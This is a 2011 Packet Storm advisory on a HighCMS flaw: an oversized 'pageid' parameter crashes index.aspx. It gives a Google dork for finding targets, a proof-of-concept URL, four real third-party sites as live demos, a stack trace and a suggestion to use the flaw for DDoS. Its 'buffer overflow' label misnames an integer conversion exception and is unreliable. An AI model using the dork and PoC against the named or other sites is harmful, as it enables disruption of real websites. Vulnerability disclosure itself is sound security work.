HighCMS Overflow

2011-10-30T00:00:00
ID PACKETSTORM:106439
Type packetstorm
Reporter BHG Security Center
Modified 2011-10-30T00:00:00

Description

                                        
                                            `----------------------------------------------------------------  
HighCMS <= (index.aspx) Buffer Overflow Vulnerability  
----------------------------------------------------------------  
  
# Exploit Title:HighCMS <= (index.aspx) Buffer Overflow Vulnerability  
# Google Dork: inurl:index.aspx?siteid=1&pageid=  
# Application Name: [HighCMS]  
# Date: 2011-10-30  
# Author: BHG Security Center  
# Home: Http://black-hg.org  
# Software Link: [ http://www.aryanic.com/products-highcms.html ]  
# Vendor Response(s): They didn't respond to the emails.  
# Version: [ 11.6 ]  
# Impact : [ Low ]  
# Tested on: [Windows Server 2003 /IIS 6.0]  
# CVE : Webapps  
  
+-----------------------+  
| Overflow Exception |  
+-----------------------+  
  
Description: You can use many of these vulnerabilities do Ddos attacks, including refref  
  
# PoC(s):  
  
http://[HOST]/index.aspx?siteid=1&pageid=[Overflow]  
  
http://[HOST]/index.aspx?siteid=1&pageid=4141414141 <> True   
  
# Demo(s):  
  
http://www.mayadin.biz/index.aspx?siteid=1&pageid=4141414141  
  
http://ielts-house.com/index.aspx?siteid=1&pageid=4141414141  
  
http://www.persiangoldfish.com/index.aspx?siteid=1&pageid=414141414141  
  
http://honarnews.org/index.aspx?siteid=1&pageid=4141414141  
  
# Output Data:  
  
[OverflowException: Arithmetic operation resulted in an overflow.]  
Microsoft.VisualBasic.CompilerServices.Conversions.ToInteger(String Value) +165  
highcms.index.page_select() +1272  
highcms.index.make_page() +2304  
highcms.index.Page_Load(Object , EventArgs ) +8725  
System.Web.UI.Control.OnLoad(EventArgs e) +132  
System.Web.UI.Control.LoadRecursive() +66  
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +2428  
  
  
# Reference:  
[1] For more information about this vulnerability (URL: http://msdn.microsoft.com/en-us/library/system.overflowexception.aspx)  
[2] For more information about this vulnerability (URL: https://www.owasp.org/index.php/Buffer_Overflows)  
  
# Important Notes:  
- Vendor did not respond to the email as well as the phone. As there is not any contact form or email address in the website, we have used all the emails which had been found by searching in Google such as support, info, and so on.  
  
# Greets To :  
  
Net.Edit0r ~ A.Cr0x ~ 3H34N ~ 4m!n ~ Cyrus ~ tHe.k!ll3r ~ 2MzRp   
  
ArYaIeIrAn ~ Mikili ~ NoL1m1t ~ cmaxx ~ G3n3Rall ~ Mr.XHat ~ cmaxx   
  
G3n3Rall ~ Mr.XHat ~ M4hd1 ~ Cru3l.b0y ~ HUrr!c4nE ~ r3v0lter  
  
s3cure.p0rt ~ THANKS TO ALL Iranian HackerZ ./Persian Gulf  
  
===========================================[End]=============================================  
`